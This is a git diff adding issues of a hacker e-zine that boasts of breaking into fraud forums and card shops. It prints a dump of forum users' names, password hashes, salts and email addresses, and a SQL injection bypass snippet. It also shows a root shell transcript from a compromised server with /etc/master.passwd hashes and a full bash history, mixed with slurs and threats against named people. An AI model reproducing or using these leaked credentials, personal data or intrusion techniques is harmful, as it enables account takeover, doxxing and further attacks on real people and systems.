8 +`b, ,P `b, ,P + """` """` + +AlterHacker:edcb38409dd601b93c6af3219d112557:9R#:BlackMaster@gmx.de +fred777:50a1eab4c63175c910df92d870136e43:^"@:nebelfrost77@googlemail.com +N1GH7FIR3:20ddb5d76b23f7e77cf82c9da0f685ee:QpY:daemonhunter.mail@gmail.com +100:f97becbc6292ac264119ca57881f643c:a<":ttorben@mailde.de +Dexx:f59393b26641a10966b1400b17f20a93:e>>:dexx@free-hack.com +noctem:23b5d90e4e8047f014ed439b092da804:l4i:noctem-fh@web.de +Vitamin X:249bd491e1a2a4241babd149c021775b:-;3:vitaminxfh@mail.ru +sn0w:3c5bc3d3863c3d06246e9dbb3563a46c:YHI:iop.123@arcor.de +Apex:2d6725508c6f575996e99add1df75b78:#fj:micki5004@hotmail.com +Toastbrot:92c5d47cb95b30c60a007af44c8e433a:GG::r4z3r2@gmx.de +inyourface:d78cd66e4cb181741dbedb122a6abb4a:LD6:xyzdf8461@gmx.de +H4x0r007:b7db51f35436e5ae0d398c8617b148f6:"zD:h4x0r2@web.de +meckl:c23f739948b0a1a5b3ad225bdf355641:bNL:meckl@privatdemail.net +J0hn.X3r:5311479819ac7652223469f9eb6afbf9:7\D:J0hn.X3r@gmail.com +#b:07ff2d241ac7b8bfda85295ad74532db:@ce:bizzit@live.de +enco:d02abd58ba8ddaa4e009970ba2aa4531:iV(:enne@bk.ru +Lidloses_Auge:df8b7b3b4a3879b62b4fa36794907425:}5*:lidlosesauge@gmail.com +Rip:0b8ccc848ca2de26becdb26635112e5f:.5%:libary.source@googlemail.com +PoLe:8b1a2783236cba650ab671ef1e3b5d69:U!w:klogger@gmx.de +GrafZeppelin:96d74a9a16342e578feabb787f9c4b65:}$/:gray_foxde@yahoo.de +GODFATHER:6e2494acbfdf1a2c8f9bc4bc58c83ba1:AGe:Mighty.Mo89@Gmail.com +Qgel:c1f57278216436f781d102fa254a077b:'yV:kug3lblitz@gmail.com +DvdRom:a51a070617594bd6321bfde8ba5f5de4:=q$:dvd_rom123@hotmail.com +Suicide:c4944d15980260f4e446b679e1769395:]fL:followtheleader@bk.ru +novaca!ne:8ee3a88448d320961ff82e8f350e21cd:BuY:novacaine@privatdemail.net +ea$y:1a8ef8a801b84e16a5a344babe49287e:V-7:localserver@gaza.net +krypt0n:855801493f43e3c7b3471e50c2ee2e7e:fZr:hellyeahima@atheist.com + +We think that novaca!ne's magic_quotes bypass is quite representative +for this group: + +--snip snip-- + +Bypass magic_quotes (novaca!ne) +magic_quotes is a php setting (php.ini). +It causes that every ' (single-quote), " (double quote) and \ (backslash) +are escaped with a backslash automatically, a weak but wellknown securing method. +This is how to bypass it: +Use the funktion called „String.fromCharCode()“, you need to translate your MySQL command +into ascII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling. +‘ OR ‘a’ = ‘a equals +String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97) + +--snip snip-- + +novaca!ne is (next to fred777) of course, our new security superhero! +Congratz, faggot... + +Finally we shouldn't forget our old fag superhero fred777, who helped +us to understand how we could get every source code of a page. This +sounds pretty hard, but fred777 shows his priv8 techniques (we fear +them): + +--snip snip-- +######################################################### +# Sourcecode disclosure by social engineering +# tested on NPD +######################################################### + +Intro: +Ich schildere hier mal einen Fall, welchen ich letztens +noch vor mir hatte. Ich war durch Zufall mal wieder auf den +vielen NPD Seiten, um nach Lücken zu suchen. +Bei einer Subpage wurde ich dann auch fündig, zumindest erweckte +es den Anschein, als ob sich da eine SQL Injection befände. + +Sobald nämlich der Limitparameter falsch übergeben wurde, kam der +übliche SQL Error: + +--------------------------------------------------------- + +Rein logisch sah der Query so aus: + +SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10; + +Als ich dann mittels eines Scripts versuchte den Query mit UNION +zu erweitern, wollte es aber nicht funktionieren. +Klar dafür konnte es so einige Gründe geben, allerdings hätte +ich mir zu gerne den Source + Abfragen angeschaut. + +--------------------------------------------------------- + +Wieso eigentlich nicht? + +Nach einigen Ãœberlegungen, schrieb ich dann eine Mail an den +Webmaster der Seite, mit dem Ziel, dass er mir den Source schickt. + +--snip snip-- + +What we learned is: +- If we write an email to an admin we always get the source code +- fred777 uses tools to exploit some sql injection + +"o_O", one of the banned users puts it nicely: "being lame is one of +fred777's master skills" Just to inform you: We owned Free-Hack with +this technique of course. + +TIME FOR SOME +______________________________________________________________________ +IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI +Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI +Ip| __| |.---.-.-----.| _ | |_| |_.---.-.----.| |--.| |aI +Ia|__ | || _ | _ || | _| _| _ | __|| < |__|lI +Il|_______|__||___._| __||___|___|____|____|___._|____||__|__||__|sI +Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI +IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI + +Right, who deserves it? Correct! Suicide and enco for being badass +super high skilled computer professionals ... NOT + +This is a warning Free-Hack. Continue existing and we will show no +mercy. Especially you, J0hn.X3r. Take your chance, go and grow up. + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ last words ~ ! + +That's all for now. We hope that those we have owned understood the +warning and that those who already enjoyed issue one were satisfied +with this release. We will take a little break for now and go to +Hawaii to get our asses drunk. But do not fear. There will always be +enough time for us to audit more code, write more 0day and own more +idiots. We will always watch the scene and act if we are needed. There +is sill a lot to do and the winter of hax is not over yet. So do +expect us. + + |\ + /()/ + \| - the happy ninjas + ____________________________________________________|_._._._._._._._, + \___________________________________________________|_|_|_|_|_|_|_|_| + ! ~ OUTRO ~ + , + . | + / + \ I + / + \ .g88R_ + d888(` ). _ + - --==, 888( ),=-- .+(` )`. +) Y8P( '`, :( . ) + .+(`( , ) .-- `. ( ) ) + (( (..__,:'-' .=( ) ` _` ) ) +`. `( ) ) ( , ) ( ) ._ + ) ` __.:' ) ( ( )) `-',:ccee88oo, +) ) ( ) --' `- __,' ccC8O8O8Q8PoOb.o8oo +.-' (_,' ,') pqdOB69QOFFE4OpugoO9bD + .(_ ) CgggbbU8OU qOp qOdoUOdcb, + . , .3X4X5U2M/p u gcoUodpP + .\\\// /douUP +And shepherds we shall be, for thee my Lord for \\\////. (´`) +thee, power hath descended forth from thy hand, |||||. ,.(´ -.),. +that our feet may swiftly carry out thy command. |||/\, ( , ,) +We shall flow a river forth to thee, and teeming |||\/. `-´`´`´. +with souls shall it ever be. In nomine patris, |||||. +et filii, et spiritus sancti ,..,,.,.,....,,,,//||||\...,,,, +,...,...,..,...,,..,,.,.,..,,.,,,.,,,,,,,..,.,,,,...,.,.,...,,..,. +.,.,,,,..,..,.,..,,,,.,..,.,,.,..,..,,,,.,...,,..,,,..,..,....,..,..,. diff --git a/owned and exposed/3.txt b/owned and exposed/3.txt new file mode 100644 index 0000000..f140061 --- /dev/null +++ b/owned and exposed/3.txt @@ -0,0 +1,13117 @@ + |\___/| + -=[ISSUE - NO 3]=- =) ^Y^ (= + -=[OF]=- \ ^ / + )=*=( + ______________________________ __ ____________ _ / \ +|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | +|| _ | | | | | -__| _ | | . | | . || /| | | |\ +||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ +| | | ______ |__//_// ___/ __ +| | | .-----.--.--.-----.| |.-----.--\_).--| || +| | | | -__|_ _| _ || || ||__ --| -__| _ || +| | | |_____|__.__| __|| || ||_____|_____|_____|| +|_/ \__________________________|__|___| || |___________________| + |______| + + Featuring... .---. /\ Brought to you by .---. + / . \ / \ your Happy Ninjas / . \ + |\_/| | | | |\_/| | + | | /| | b | | | /| + .-----------------------' | | a | .---------------------------' | + / .-. | | c | / .-. | +| / \ Intro | | k | | / \ The Happy Ninja Faker | +| |\_. | St0re.cc | | | | |\_. | Swissfaking.net | +|\| | /| El-Basar.biz | | | |\| | /| Vpn24.org | +| `---' | | | o | | `---' | | +| |------------------' | n | | |----------------------' +\ | .---. | c | \ | .---. + \ / / . \ | e | \ / / . \ + `---' |\_/| | | | `---' |\_/| | + | | /| | | | | /| + .-----------------------' | | a | .---------------------------' | + / .-. | | g | / .-. | +| / \ Undercover.su | | a | | / \ Secure-Host.in | +| |\_. | k!LLu's Botnet | | i | | |\_. | Unique-Crew.net | +|\| | /| | | n | |\| | /| | +| `---' | | | | | `---' | | +| |------------------' | | | |----------------------' +\ | .---. | h | \ | .---. + \ / / . \ | e | \ / / . \ + `---' |\_/| | | r | `---' |\_/| | + | | /| | e | | | /| + .-----------------------' | | | .---------------------------' | + / .-. | | | / .-. | +| / \ Zion-Network.net | | t | | / \ Some leftovers | +| |\_. | Hackbase.cc | | o | | |\_. | Outro | +|\| | /| | | | |\| | /| | +| `---' | | | | | `---' | | +| |------------------' | r | | |----------------------' +\ | | m | \ | + \ / | | \ / + `---' | /\ | `---' + :\______|/ \|______/: + \__0day______0day__/ + | /\ | + || || + || || + || || + || || + | \/ | + \____/ + (____) + +First of all, here is the verification of the sha1 hash we published +when hba-crew got owned: 49bd4433fff1b04530dcaff1f52fa971ff895871 = +sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03) + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((========={ Intro }=========------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Tonight's the night. And it's going to happen, +,;' \ /-(.;, ) again and again. It has to happen. + ) / ) / + // || We all want to welcome you to a brand new issue + )_\ )_\ of Owned and exp0sed! Before we get to the fun +part, we'd just like to clarify some things since there has been a lot +going on on the internet since our last issue. + +Movements, as they put it, like Anonymous or the short-lived +phenomenon of Lulzsec have gotten an increasingly important topic to +media and the public. We want to line out our motivation in contrast +to theirs. Anonymous has tried to gain as much media attention as +possible by inflicting the most damage possible on big companies and +service providers. Similarily, Lulzsec have attacked various websites +and published an enormous amount of information. + +However, while it's their goal to put up pressure on governments and +big organizations, it's ours to protect the public from the abysses of +the internet. Fraud is our main concern and we intent to contain it as +much as possible. While Anon and Lulzsec toss out their stuff within +weeks, we take our time to gain access, collect data and aggregate it +nicely for you, our readers. This is why there is a substantial +time span between our releases. + +We of course also monitor the German and international fraud scene as +it recovers from our attacks; it's hard to stop something that is +driven by selfishness, greed and money. We also find it worrying that +Anonymous and especially Lulzsec act in what they call "Operation +Antisec". The original Antisec Movement was brought to life by actual +hackers and targeted full disclosure and the corporate security +industry. Publishing gigantic amounts of (corporate) data on the +internet does exactly the opposite: It provides the security industry +with the attention they need and hence new customers. + +But let's now look at why we are here today. "Money is the root of all +evil" as the proverb has it; and it's why fraud communities do come +back after we have owned and exposed them; but as long as they carry +on, we do, too. Fraudsters ought to know that they're not safe because +we are going to hunt down every single site that is left. We +experience the fraud scene scattering wider and wider after every +issue we have published; new boards, and with them new admins, emerge +out of nowhere. That just shows well again how stubborn fraudsters are +as most of them still refuse to accept that they lost their right to +exist on the internet. It's particularly frustrating that they don't +seem to draw lessons from getting owned again and again. + +That being said we can just strongly advise you to spend your time on +something worthwhile. It's not too late ... + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------========={ St0re.cc }==========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +Let's head to our first target. Fraud or scene ~ | ||( );, +shops in general have not been our main concern. ( ,;.)-\ / ';, +During our many break-ins in other fraud \ ( \ ( +communities, we often were dazzled with glaring || \\ +banners of underground markets where you could buy /_( /_( +"fresh" CCs, PayPal accounts or socks5 proxies to stay "secure" while +carding. So by now we got the hint that it might be worth finding out +out how often and by whom these shops were really used. It's quite +impressive how much money you can make by simply stealing PayPal +accounts with a RAT and not using it for fraud but for selling it to +scammers instead. That's why we clicked on the first banner we saw and +concluded that it would be a noble action to root. We actually got +pretty lucky since st0re.cc was not the only credit card store on that +server. We spotted some others like the infamous El-Basar.biz (it was +already shown in a German tv show), the rest is not worth to mention. +Anyway this is what you get if you decide to buy credit cards in a +webshop: You will get owned and exposed. Like always. + +# uname -a +FreeBSD 6.4-RELEASE-p11 i386 i386 SMP-GENERIC + +# id +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) + +# cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# +root:*:0:0:Charlie &:/root:/usr/local/bin/bash +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin +nukeuploads:*:1001:1001:User &:/home/nukeuploads:/bin/sh +ayoga:*:1002:1002:User &:/home/ayoga:/sbin/nologin +alg:*:1004:1004:User &:/home/alg:/bin/sh +propiska:*:1005:1005:User &:/home/propiska:/sbin/nologin +msk:*:1007:1007:User &:/home/msk:/sbin/nologin +vestacomp:*:1006:1006:User &:/home/vestacomp:/sbin/nologin +crank2010:*:1016:1016:User &:/home/crank2010:/sbin/nologin +lordknight:*:1019:1019:User &:/home/lordknight:/bin/sh +madrage:*:1003:1003:User &:/home/madrage:/bin/sh +scenehack:*:1008:1008:User &:/home/scenehack:/sbin/nologin +thefuelru:*:1009:1009:User &:/home/thefuelru:/sbin/nologin +mr101:*:1021:1021:User &:/home/mr101:/bin/sh +szenevz:*:1011:1011:User &:/home/szenevz:/sbin/nologin +exchanger:*:1012:1012:User &:/home/exchanger:/bin/sh +filip:*:1023:1023:User &:/home/filip:/sbin/nologin +mmgen:*:1018:1018:User &:/home/mmgen:/sbin/nologin +ganymedes:*:1024:1024:User &:/home/ganymedes:/sbin/nologin +garf:*:1031:1031:User &:/home/garf:/sbin/nologin +onlineschauen:*:1013:1013:User &:/home/onlineschauen:/bin/sh +snetwork:*:1022:1022:User &:/home/snetwork:/sbin/nologin +useresu:*:1010:1010:User &:/home/useresu:/sbin/nologin +useresu1:*:1026:1026:User &:/home/useresu1:/sbin/nologin +margosha:*:1020:1020:User &:/home/margosha:/sbin/nologin +pavlrse:*:1027:1027:User &:/home/pavlrse:/sbin/nologin +muraaat:*:1000:1000:User &:/home/muraaat:/sbin/nologin +test4me:*:1014:1014:User &:/home/test4me:/bin/sh + +# cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# +root:*:0:0::0:0:Charlie &:/root:/usr/local/bin/bash +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +cyrus:*:60:60::1172782800:0:the cyrus mail server:/nonexistent:/usr/sbin/nologin +nukeuploads:$1$hO28fqpU$OL/RovJhduUxEqR3kBawe.:1001:1001::0:0:User &:/home/nukeuploads:/bin/sh +ayoga:$1$CNCuqfrs$p7QpuHI6jagkVUyvGO5MI.:1002:1002::0:0:User &:/home/ayoga:/sbin/nologin +alg:$1$A07..akS$.TPW7o0ZCO25bB6AltS/Q.:1004:1004::0:0:User &:/home/alg:/bin/sh +propiska:$1$Hgb0peXw$2wtRLXytI9Mmwbsxi/RAI.:1005:1005::0:0:User &:/home/propiska:/sbin/nologin +msk:$1$yqxdalvS$IPYorMt8h.pMqc3V8mdED0:1007:1007::0:0:User &:/home/msk:/sbin/nologin +vestacomp:$1$bL6RZJ2K$f7CTWRj.ps2Q9XuImy4sI1:1006:1006::0:0:User &:/home/vestacomp:/sbin/nologin +crank2010:*:1016:1016::0:0:User &:/home/crank2010:/sbin/nologin +lordknight:*:1019:1019::0:0:User &:/home/lordknight:/binbreak-ins in other fraud/sh +madrage:*:1003:1003::0:0:User &:/home/madrage:/bin/sh +scenehack:*:1008:1008::0:0:User &:/home/scenehack:/sbin/nologin +thefuelru:*:1009:1009::0:0:User &:/home/thefuelru:/sbin/nologin +mr101:*:1021:1021::0:0:User &:/home/mr101:/bin/sh +szenevz:*:1011:1011::0:0:User &:/home/szenevz:/sbin/nologin +exchanger:*:1012:1012::0:0:User &:/home/exchanger:/bin/sh +filip:$1$asb5GyOE$OHPPapNFMf6zKA5FvrIpE/:1023:1023::0:0:User &:/home/filip:/sbin/nologin +mmgen:$1$bnXQT0ng$obWjcBQFTBTKk83ElXfDt0:1018:1018::0:0:User &:/home/mmgen:/sbin/nologin +ganymedes:$1$95EongK1$fFPWI1ePR8VKBIAQ/LwUu0:1024:1024::0:0:User &:/home/ganymedes:/sbin/nologin +garf:$1$xzEPVuNH$26jps1eOPu2hNObvlcgkH0:1031:1031::0:0:User &:/home/garf:/sbin/nologin +onlineschauen:$1$RihNUTco$hzbht5CwvI/h3X0cGe8T91:1013:1013::0:0:User &:/home/onlineschauen:/bin/sh +snetwork:$1$y0T7yJX4$ER.mYpG3P21qlz3qgQWtN.:1022:1022::0:0:User &:/home/snetwork:/sbin/nologin +useresu:$1$6J5xPk5F$sfpn5pAKTlf10hX3kSKkv.:1010:1010::0:0:User &:/home/useresu:/sbin/nologin +useresu1:$1$gPsMDoWO$.Ve9Z8tEQLZrlF7MrP6ZH1:1026:1026::0:0:User &:/home/useresu1:/sbin/nologin +margosha:*:1020:1020::0:0:User &:/home/margosha:/sbin/nologin +pavlrse:$1$AKfcvELm$oImAlQWKKDaEd.dimM6wY/:1027:1027::0:0:User &:/home/pavlrse:/sbin/nologin +muraaat:*:1000:1000::0:0:User &:/home/muraaat:/sbin/nologin +test4me:$1$nNH.D3yA$2KQeYLwqG3TcFHOc9toFL0:1014:1014::0:0:User &:/home/test4me:/bin/sh + +# pwd +/root + +# ls -la +total 715748 +drwxr-xr-x 4 root wheel 512 Sep 9 04:43 . +drwx--x--x 18 root wheel 512 Apr 12 19:59 .. +-rw------- 1 root wheel 10017 Sep 26 02:59 .bash_history +-rw------- 1 root wheel 67 Sep 9 17:00 .cvspass +-rw------- 1 root wheel 50 Feb 9 2011 .lesshst +drwxr-xr-x 3 root wheel 512 Sep 26 02:57 .mc +-rw------- 1 root wheel 1344 May 20 03:24 .mysql_history +drwx------ 2 root wheel 512 Aug 14 19:22 .ssh +-rwxr-xr-x 1 root wheel 241 Jul 21 00:11 addban.sh +-rw-r--r-- 1 root wheel 601437 Apr 12 17:56 apache.log +-rwxr-xr-x 1 root wheel 89 Mar 6 2010 apache_watchdog.php +-rwxr-xr-x 1 root wheel 4184 Feb 2 2011 mydumpsplitter.sh +-rwxr-xr-x 1 alg www 365607550 Feb 1 2011 zzz.sql + +# cat .bash_history +apachectl restart +exit +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/apache22 restart +top -S +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/apache22 restart +cd /home/alg/ +mc +mysql -u root -p`cat /etc/my.passwd ` +cd db_split/ +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql +ls -la +mcedit postindex.sql +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < adminlog.sql +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < attachment.sql +top +cd .. +wget +wget http://platon.sk/cvs/cvs.php/___checkout___/scripts/perl/mysql/mysqldump-convert.pl?rev=1.5&content-type=text/plain mysqldump-convert.pl +mc +ls +mcedit mysqldump-convert.pl\?rev\=1.5 +mc +cat db_split/postindex.sql | ./mysqldump-convert.pl > postindex.sql +mcedti postindex.sql +mcedit postindex.sql +mcedit mysqldump-convert.pl +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql +exit +mc +/usr/local/etc/rc.d/apache22 restart +top +mc +date +exit +mc +cd /home/nukeuploads/nukeuploads.com/ +chown nukeuploads:nukeuploads google4973efd9f5db5c16.html +mc +apachectl restart +uptime +top +tail -n 1000 /var/log/httpd/httpd_access.log +ps aux | grep nginx +mc +exit +apachectl stop +uptime +uptime +uptime +uptime +uptime +top +apachectl start +exit +tail -n 1000 /var/log/httpd/httpd_access.log +exit +top +apachectl restart +top +tail -n 1000 /var/log/httpd/httpd_access.log +tail -n 1000 /var/log/httpd/httpd_access.log +exit +apachectl restart +top +exit +tail -f /var/log/httpd/httpd_access.log +apachectl stop +killall -9 httpd +apachectl start +tail -f /var/log/httpd/httpd_access.log +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +mc -d +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +top +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +top +top +uptime +uptime +uptime +uptime +uptime +uptime +top +cd /home/kirbysho/ +mc +uptime +uptime +uptime +mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf +apachectl restart +top +mc +mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf +apachectl restart +uptime +uptime +uptime +uptime +uptime +uptime +top +tail -n 100 /var/log/httpd/httpd_access.log +uptime +uptime +uptime +uptime +top +exit +apachectl restart +exit +tail -f /var/log/httpd/httpd_access.log +killall -9 httpd +apachectl restart +top +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +mc -d +date +date +date +date +date +date +date +date +killall -9 httpd +apachectl start +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +tail -n 10000 /var/log/httpd/httpd_access.log | grep "russian-elite" > /root/apache.log +mc +killall -9 httpd +apachectl start +top +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +killall -9 httpd +apachectl start +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +cat /var/log/httpd/httpd_access.log | grep kirby-shop.ru > /var/log/httpd_kirby.log +cat /var/log/httpd/httpd_access.log +cat/var/log/httpd_kirby.log +cp /var/log/httpd_kirby.log +cp /var/log/httpd_kirby.log /home/kirbysho/ +ls /home/kirbysho/ +exit +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +top +top +ps ax +tail -f /var/log//httpd/httpd_access.log +tail -f /var/log//httpd/httpd_access.log +ps ax +top +ls -l +ping ya.ru +ping google.com +exit +mc +tail -f /var/log/httpd/httpd_access.log +mc +mc +mysql -unukeuploads_gla -p -h db.nukeuploads.com nukeuploads_gla +mysql -unukeuploads_gla -p -h +mysql -unukeuploads_gla -p -h +mysql -unukeuploads_gla -p -h 92.241.164.71 nukeuploads_gla +mc +nslookup +mc +nslookup +tail -n 1000 /var/log/httpd/httpd_access.log +exit +tail -n 1000 /var/log/httpd/httpd_access.log +top +exit +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -n 1000 /var/log/httpd/httpd_access.log +exit +tail -n 100 /var/log/httpd/httpd_access.log +tail -n 100 /var/log/httpd/httpd_access.log | grep russian | wc -l +exit +tail -f /var/log/httpd/httpd_access.log +touch ~/addban.sh +chmod +x ~/addban.sh +mcedit ~/addban.sh +tail -n 100 /world/sec1005/var/log/httpd/httpd_access.log | grep 'swissfaking.net' | awk '{print }' | sort | uniq -c | sort -n | awk '{if ($1>3) print $2}' +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/apache22 restart +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/nginx status +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tcpdump -nn host 187.160.244.66 +tcpdump -nni bge0 host 187.160.244.66 +tcpdump -nni bge0 host 187.160.244.66 +sort /var/log/httpd/httpd_load.log | awk '{print $1}' | uniq -c +mc +mc -d +php -V +php -v +mysql -v +mysql -V +top +mc +ls -la +cd /home/margosha/ +ls -la +pwd +mc +killall -9 mc +ls -la +cd forum.la2amadis.ru/ +ls -la +cd .. +ls -la +chown -cRv margosha:www ./* +chown -cRv margosha:www ./* +chown -cR margosha:www ./* +chown -R margosha:www ./* +ls -la +cd forum.la2amadis.ru/ +ls -la +cd .. +ls -la +cd la2amadis.ru/ +ls -la +mc +ps ax +w +ps axu +ps axu +tail -f /var/log/httpd/httpd_access.log +exit +ps wauxf +cat /proc/22623/cmdline +kill -9 22623 +ps wauxf +df -h +cd /home/toco123/ +ls -la +cd 00/ +ls -la +mc +killall -9 mc +ps wauxf +df -h +ls /tmp +ls -la +ls -la /tmp/ +ps wauxf +df -h +w +cd / +ls -la +cat /etc/fsta +ps wauxf +kill -9 22623 +cd /tmp/ +ls -la +rm a.* +ls -la +tail -f /var/log/httpd/httpd_access.log +w +ps wauxf +ifconfig +cd /home/ +ls -la +mc +cd /home/margosha/ +tar czfv backup.tgz forum.la2amadis.ru la2amadis.ru +mc +chown margosha:www backup.tgz +mc +php -v +cd /usr/ports/mail/php-imap +cd /usr/ports/ +cd ./mail +ls |grep imap +cd php5-imap +make install clean +cd /usr/local/etc/ +ls +mc +mc +cd /usr/ports/mail/php52-imap +make install clean +cd /usr/ports/mail/php5-imap +make install clean +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +cd /usr/ports/mail/php52-imap +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +cd /usr/ports/ports-mgmt/portdowngrade +make install clean +make install clean +cd /usr/ports/mail/php5-imap +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +cd /usr/ports/mail/php5-imap +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +php -m +whereis portdowngrade +cd /usr/ports/ports-mgmt/portdowngrade +make install clean +cd /usr/ports/devel/popt +make install clean +cd /usr/ports/devel/libtool22 +make install clean +cd - +make install clean +uname -a +php -v +cd /usr/ports/lang/php52-extensions/ +make config +make +cd ../php5-extensions/ +make config +make +php -v +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +touch /root/.cvspass +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +php -v +portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s 